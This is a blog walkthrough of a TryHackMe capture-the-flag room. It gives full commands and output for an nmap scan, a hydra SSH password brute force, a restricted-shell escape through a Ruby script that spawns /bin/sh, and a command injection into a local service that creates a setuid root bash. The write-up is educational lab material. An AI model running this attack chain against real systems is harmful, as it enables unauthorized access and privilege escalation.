The platform develops virtual
classrooms that not only allow users to deploy training environments with the
click of a button, but also reinforce learning by adding a question-answer
approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.
While using a question-answer model
does make learning easier, TryHackMe allows users to create their own virtual
classrooms to teach particular topics enabling them to become teachers. This
not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
I'll give you a valuable source to find stuff related to Offensive Security using Ruby: https://rubyfu.net/....TryHackMe Red Stone One Carat
We start of my driving of tryhackme this room a quick scan on all ports using running nmap service scan to cover the top port...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$ sudo nmap -A -T4 -Pn -sV -vv -p- 10.10.221.171 [sudo] password for hackerboy: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-14 14:39 IST NSE: Loaded 153 scripts for scanning. Initiating NSE at 14:39 Nmap scan report for 10.10.221.171 Host is up, received user-set (0.28s latency). Scanned at 2021-05-14 14:39:32 IST for 742s Not shown: 65534 closed ports Reason: 65534 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2e:8c:cf:37:0f:99:c9:2d:46:08:6b:52:3b:a8:28:8c (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCp3zZeaCTMWxYy/DMUtf8SK/GSdrHS8qKlI6wePIFEB4mUCxzEWnJ2uu4+xFJoOwZ5RyoZPIr54suLINtGj1oL3tMO039HaQOPaZ10/vSQk7ynCyA300YUm8thcBGjqeM39O8qdeyhPL8COJ3a3jyOVOfOhnXGq94FLR+k1WTXA1vp3lROwPArr3cabXbOgxyeHiJKXo4UZqFulrkv5La4mnUs50293bfnRg96FHlmTfZVN326832+VirsGeMbdeKPP62UHpC7DRLE8Q7L4rUP2XIYMkJs4Llm381eb+L7rWUBG8oWS3MpIvqrmFoS2SnYa1qWgoyADTVfUJtZvETp | 256 59:3e:40:48:4a:1a:cb:de:ad:d7:70:e8:fb:ca:82:c1 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLFEm3SqL1hzvfyQjVs7LpYCbOw5bURoa0+t1T56flwOO0Ls2YeB6ANnuhLhuuw74uqsMleRNcsaAGKxQudRLWk= | 256 4d:0d:ae:87:41:1d:14:5a:c0:6f:3d:c1:ed:7b:b6:d6 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP1fljnhItb00uA6HXjmJSSN9E94e0WFFXO0PaL2TvYo No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=5/14%OT=22%CT=1%CU=34254%PV=Y%DS=2%DC=T%G=Y%TM=609E413 OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 743.07 seconds Raw packets sent: 74688 (3.290MB) | Rcvd: 70180 (2.835MB) ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop] └─$
But as soon as I saw the tryhackme hint I felt that I was going in the wrong direction, but maybe not now because first of all we will attack Brute Force with the wordlist file rockyou.txt and add it to a new file and it is called as password.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ grep bu /home/hackerboy/Documents/rockyou.txt > password.txt grep: /home/hackerboy/Documents/rockyou.txt: binary file matches ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ ls password.txt ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ file password.txt password.txt: UTF-8 Unicode text ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$
So, now we will crack a password with password.txt file and the
username is noraj that i got a tryhackme room...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ hydra -l noraj -P password.txt ssh://10.10.28.121 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-14 17:24:01 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 126338 login tries (l:1/p:126338), ~7897 tries per task [DATA] attacking ssh://10.10.28.121:22/ [STATUS] 177.00 tries/min, 177 tries in 00:01h, 126163 to do in 11:53h, 16 active [22][ssh] host: 10.10.28.121 login: noraj password: cheeseburger 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-14 17:25:41 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ 255 ⨯
Now, after cracking let's access SSH via some credentials
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ ssh noraj@10.10.28.121 The authenticity of host '10.10.28.121 (10.10.28.121)' can't be established. ECDSA key fingerprint is SHA256:SuMSHpQhKSw7AAbZmXq3aY/GOitfbGFUiIg2cTZFfOc. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.28.121' (ECDSA) to the list of known hosts. noraj@10.10.28.121's password: red-stone-one-carat%
Now we have gone to an interpreter as you can see that any kind of command is
not working here, so now I again went to the tryhackme room and saw that it
was created with ruby programming.
Finally this command works..
pwd
echo *
echo .*
and some file appear here!!! Vola :-)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ ssh noraj@10.10.28.121 red-stone-one-carat% red-stone-one-carat% ls zsh: command not found: ls red-stone-one-carat% cd cd: restricted red-stone-one-carat% pwd /home/noraj red-stone-one-carat% echo * bin user.txt red-stone-one-carat% echo .* .cache .hint.txt .zcompdump .zshrc red-stone-one-carat% echo bin/* bin/test.rb red-stone-one-carat%
So, lets check other file via this command...and i saw ruby file here
echo bin/*
test.rb (file showing here)
You could transfer all the files you see with scp to your machine and read
them there. But in this case, executing the file “test.rb” will print its
contents:
red-stone-one-carat% red-stone-one-carat% echo bin/* bin/test.rb red-stone-one-carat% test.rb #!/usr/bin/ruby require 'rails' if ARGV.size == 3 klass = ARGV[0].constantize obj = klass.send(ARGV[1].to_sym, ARGV[2]) else puts File.read(__FILE__) end red-stone-one-carat%
After searching some stuff what this ruby code means, you can create a payload
to start sh:
(After getting the shell, you have to reset the PATH
variable):
Vola guys we got a user.txt (flag)
red-stone-one-carat% red-stone-one-carat% test.rb Kernel 'system' "/bin/sh" $ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin $ /usr/lib/klibc/bin/cat user.txt THM{3a106092635945849a0fbf7bac92409d}$ $
Next enumerate listening ports. Because netstat and ss are not allowed for the
user noraj, you have to do netstat with some ruby code.
Transfer
the ruby file first:
$ $ ls bin user.txt $ ls bin netstat.rb user.txt $
and with wget command download this file (netstat.rb) in our machine
and transfer it in victim machine via scp
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ wget https://gist.githubusercontent.com/kwilczynski/954046/raw/4571a1eed62c4f13d0a2c70c5cf5ebd45e41004e/netstat.rb --2021-05-14 17:46:54-- https://gist.githubusercontent.com/kwilczynski/954046/raw/4571a1eed62c4f13d0a2c70c5cf5ebd45e41004e/netstat.rb Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ... Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.110.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 1334 (1.3K) [text/plain] Saving to: ‘netstat.rb’ netstat.rb 100%[===========================================================>] 1.30K --.-KB/s in 0s 2021-05-14 17:47:00 (14.2 MB/s) - ‘netstat.rb’ saved [1334/1334] ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ ls netstat.rb password.txt ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$ scp netstat.rb noraj@10.10.28.121:~/netstat.rb noraj@10.10.28.121's password: netstat.rb 100% 1334 5.3KB/s 00:00 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/redcarpet] └─$
Then execute the transferred file:
$ $ ruby netstat.rb 0.0.0.0:22 0.0.0.0:0 LISTEN 127.0.0.1:31547 0.0.0.0:0 LISTEN 127.0.0.53:53 0.0.0.0:0 LISTEN 10.10.28.121:22 10.8.61.234:58296 ESTABLISHED $ $ nc localhost 31547 $ exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash! $
Connect to the service at port 31547 and bypass the blacklist to execute commands:
$ $ /tmp/bash -p bash-4.4# id uid=1001(noraj) gid=1001(noraj) euid=0(root) egid=0(root) groups=0(root),1001(noraj) bash-4.4# whoami root bash-4.4# cat /root/root.txt THM{58e53d1324eef6265fdb97b08ed9aadf}bash-4.4# bash-4.4# bash-4.4#
and finally we got a flag (root flag) :-)
Disclaimer
This was written for educational purpose and pentest only.
The author
will not be responsible for any damage ..!
The author of this tool is not
responsible for any misuse of the information.
You will not misuse the
information to gain unauthorized access.
This information shall only be
used to expand knowledge and not for causing malicious or damaging
attacks. Performing any hacks without written permission is illegal ..!
All
video’s and tutorials are for informational and educational purposes only. We
believe that ethical hacking, information security and cyber security should
be familiar subjects to anyone using digital information and computers. We
believe that it is impossible to defend yourself from hackers without knowing
how hacking is done. The tutorials and videos provided on www.hackingtruth.in
is only for those who are interested to learn about Ethical Hacking, Security,
Penetration Testing and malware analysis. Hacking tutorials is against misuse
of the information and we strongly suggest against it. Please regard the word
hacking as ethical hacking or penetration testing every time this word is
used.
All tutorials and videos have been made using our own
routers, servers, websites and other resources, they do not contain any
illegal activity. We do not promote, encourage, support or excite any illegal
activity or hacking without written permission in general. We want to raise
security awareness and inform our readers on how to prevent themselves from
being a victim of hackers. If you plan to use the information for illegal
purposes, please leave this website now. We cannot be held responsible for any
misuse of the given information.
- Hacking Truth by
Kumar Atul Jaiswal
I hope you liked this post, then you
should not forget to share this post at all.
Thank you so much :-)
0 comments:
Post a Comment
For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.